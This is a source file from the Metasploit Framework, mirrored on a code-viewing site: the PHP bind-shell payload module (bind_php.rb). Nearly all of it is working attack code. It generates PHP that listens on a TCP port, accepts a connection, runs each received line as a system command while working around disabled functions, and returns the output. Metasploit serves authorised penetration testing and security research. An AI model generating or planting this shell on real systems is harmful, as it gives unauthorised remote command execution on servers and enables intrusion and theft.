Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/php/bind_php.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
module MetasploitModule

7
  CachedSize = :dynamic

8


9
  include Msf::Payload::Single

10
  include Msf::Payload::Php

11
  include Msf::Sessions::CommandShellOptions

12


13
  def initialize(info = {})

14
    super(

15
      merge_info(

16
        info,

17
        'Name' => 'PHP Command Shell, Bind TCP (via PHP)',

18
        'Description' => 'Listen for a connection and spawn a command shell via php',

19
        'Author' => ['egypt', 'diaul <diaul[at]devilopers.org>',],

20
        'License' => BSD_LICENSE,

21
        'Platform' => 'php',

22
        'Arch' => ARCH_PHP,

23
        'Handler' => Msf::Handler::BindTcp,

24
        'Session' => Msf::Sessions::CommandShell,

25
        'PayloadType' => 'cmd',

26
        'Payload' => {

27
          'Offsets' => {},

28
          'Payload' => ''

29
        }

30
      )

31
    )

32
  end

33


34
  #

35
  # PHP Bind Shell

36
  #

37
  def php_bind_shell

38
    dis = '$' + Rex::Text.rand_text_alpha(4..7)

39
    shell = <<-END_OF_PHP_CODE

40
    #{php_preamble(disabled_varname: dis)}

41
    $port=#{datastore['LPORT']};

42


43
    $scl='socket_create_listen';

44
    if(is_callable($scl)&&!in_array($scl,#{dis})){

45
      $sock=@$scl($port);

46
    }else{

47
      $sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);

48
      $ret=@socket_bind($sock,0,$port);

49
      $ret=@socket_listen($sock,5);

50
    }

51
    $msgsock=@socket_accept($sock);

52
    @socket_close($sock);

53


54
    while(FALSE!==@socket_select($r=array($msgsock), $w=NULL, $e=NULL, NULL))

55
    {

56
      $o = '';

57
      $c=@socket_read($msgsock,2048,PHP_NORMAL_READ);

58
      if(FALSE===$c){break;}

59
      if(substr($c,0,3) == 'cd '){

60
        chdir(substr($c,3,-1));

61
      } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {

62
        break;

63
      }else{

64
        #{php_system_block({ cmd_varname: '$c', output_varname: '$o', disabled_varname: dis })}

65
      }

66
      @socket_write($msgsock,$o,strlen($o));

67
    }

68
    @socket_close($msgsock);

69
    END_OF_PHP_CODE

70


71
    return shell

72
  end

73


74
  #

75
  # Constructs the payload

76
  #

77
  def generate(_opts = {})

78
    return super + php_bind_shell

79
  end

80
end

81


82